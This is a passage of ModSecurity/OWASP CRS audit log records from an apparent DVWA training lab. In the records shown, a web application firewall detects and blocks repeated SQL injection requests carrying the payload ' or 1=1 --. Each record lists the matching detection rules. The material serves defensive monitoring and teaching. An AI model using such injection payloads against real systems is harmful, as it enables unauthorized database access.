\"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc08n8AAQEAAAkZ0BUAAAAE\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":411,"p2":1609,"p3":128,"p4":420,"p5":95,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:50 --0400","transaction_id":"WRc09n8AAQEAAAkZ0BYAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc09n8AAQEAAAkZ0BYAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":619,"p2":3338,"p3":0,"p4":0,"p5":174,"sr":26,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:53 --0400","transaction_id":"WRc0@X8AAQEAAAkZ0BcAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@X8AAQEAAAkZ0BcAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":414,"p2":2106,"p3":0,"p4":0,"p5":161,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:31:55 --0400","transaction_id":"WRc0@38AAQEAAAkZ0BgAAAAE","remote_address":"192.168.75.145","remote_port":56792,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27+or+1%3D1+--+%22&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=95","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: ' or 1=1 -- \\\\\\\\x22\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: ' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc0@38AAQEAAAkZ0BgAAAAE\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":408,"p2":2071,"p3":0,"p4":0,"p5":167,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
